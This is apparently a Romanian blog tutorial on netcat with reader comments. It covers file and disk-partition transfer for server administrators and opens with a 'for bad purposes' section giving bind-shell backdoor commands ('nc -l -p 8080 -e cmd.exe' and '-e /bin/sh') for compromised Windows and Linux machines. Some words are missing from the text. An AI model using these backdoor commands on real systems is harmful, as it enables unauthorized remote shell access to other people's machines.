Netcat – pentru scopuri rele, dar si pentru Administratori de servere

NetcatProgramul, utilitarul netcat este folosit mai ales de , dar poate fi folosit si pentru scopuri bune. Originalul programului era un program in Unix, dar mai tarziu au aparut si versiunile pentru Linux si pentru Windows. Netcat este de obicei folosit ca si backdoor de catre pe calculatoare, servere sparte. Necat este capabil sa infiinteze o conexiune TCP sau UDP intre doua calculatoare, adica poate sa scrie si sa citeasca printr-un port deschis. Astfel cu ajutorul programului se pot transfera fisiere si se pot executa comenzi in anumite cazuri.Poate fi filosit pentru scanarea porturilor, desi nu pentru aceasta latura este renumit. Netcat este un program foarte vechi, dar e folosit si acum si de multe ori a fost nominalizat ca fiind unul dintre cele mai importante simple utilitare de securitate.

Netcat folosit pentru scopuri rele

In Windows
Ca sa ne conectam la un calculator cu sistemul de operare Windows, prima data trebuie sa pornim programul netcat ptrintr-un port deschis, adica care nu e protejat de un firewall.

Comanda executata pe calculatorul la care vrem sa ne conectam!

C:\nc.exe -l -p 8080 -e c:\windows\system32\cmd.exe

Cand executati aceasta comanda nu va aparea nimic dupa ce apasati pe Enter, insa se va deschidea o conexiune la care se poate conecta.

-l = Listen, adica deschidem o conexiune

-p = Port, specificam pe care port se sa deschida conexiunea (in anumite versiuni a programului nu trebuie sa scrieti directiva -p, doar numarul portului

-e = Comanda care sa fie executata cand se conecteaza la portul definit

Comanda ca sa ne conectam

C:\nc.exe 192.168.1.101 8080

Microsoft Windows XP [Version 5.xx]

(C) Copyright 1985-x Microsoft Corp.

C:\

In Linux

In linux singura diferenta este faptul, ca acolo trebuie sa pornim un alt Shell, adica program care accepta comenzi

root# nc -l -p 8080 -e /bin/sh

In windows versiunile netcatului care suporta directiva -e, adica executa, sunt detectate de obicei de catre programele de antivirus, si la devirusare de obicei sunt sterse, insa transmiterea fisierelor cu versiunile care nu executa comenzi, este posibila si in aceste cazuri.

Netcat folosit pentru Scopuri bune

Netcat poate fi si este folosit si de administratorii de servere. Cand se sparge un server, i de obicei schimba, infecteaza fisierele binare de pe sistem, si astfel chiar si daca administratorul se apuca sa curete sistemul s-ar putea sa nu reuseasca pentru ca munca lui poate fi urmarit de . Ganditi-va de exemplu la schimbarea parolelor. In aceste cazuri daca avem scris pe un cd programul netcat, se poate conecta la server, fara ca conexiunea respectiva sa fie compromisa.
Un alt avantaj al programului mai este posibilitatea copierii a fisierelor prin retea, fara sa avem un server FTP, HTTP sau orice alt serviciu care permite transmitrea datelor. Cu netcat se poate copia fisiere mici si mari foarte usor, inclusiv partitii intregi.

Exemple

Citirea unui fisier txt de la distanta

Haideti sa presupune ca avem un fisier txt, care se numeste, adrese-web.txt si contine textul “parola adresa web www.exemplu.com”

Comanda pentru servirea fisierului:

root# nc -l -p 8080 < adrese-web.txt

Comanda pentru citirea fisierului, si cum va arata, adica continutul fisierului adrese-web.txt

root# nc 192.168.1.101 8080

parola adresa web www.exemplu.com

Copierea a unui fisier cu Netcat

Trimiterea fisierului

root# cat imagine.jpg | nc -l 5050

Primirea fisierului

root# nc 192.168.1.101 5050 > imagine.jpg

Copierea a unei partitii intregi cu netcat

Crearea imaginii si trimiterea fisierului

root# dd if=/dev/hdb2 | gzip -9 | nc -l 5050

Primire

root# nc 192.168.1.101 5050 | pv -b > partitiahdb2.img.gz

-pv = progress indicator, ca sa va arate cat s-a copiat

In ultima vreme programul netcat pentru Windows se poate gasi pe net din ce in ce mai greu, ca sa va economisesc din timpul vostru, aici este un link de unde putet-i sa-l downloadati: download netcat windows, versiunile pentru Linux veti gasi usor.

3 Comentarii

  1. AlexXbdD a scris la: 29 January 2012 at 10:05

    ma eu caut ceva care sa imi deschida porturile.. cum pot fece asta??

  2. istvan a scris la: 30 January 2012 at 11:45

    Salut Alex, porturile sunt inchise intotdeauna cu ajutorul unui firewall. Ca sa deschizi un anumit port atat in Linux cat si in Windows, trebuie sa setezi din firewall – adica adaugi portul respectiv ca si o exceptie care sa nu fie protejat de firewall. Nu stiu de existenta unei versiuni a programului Netcat care sa faca acest lucru automat!

  3. sindogy a scris la: 18 March 2013 at 21:33

    citeste 5 ani in poli si ai sa inveti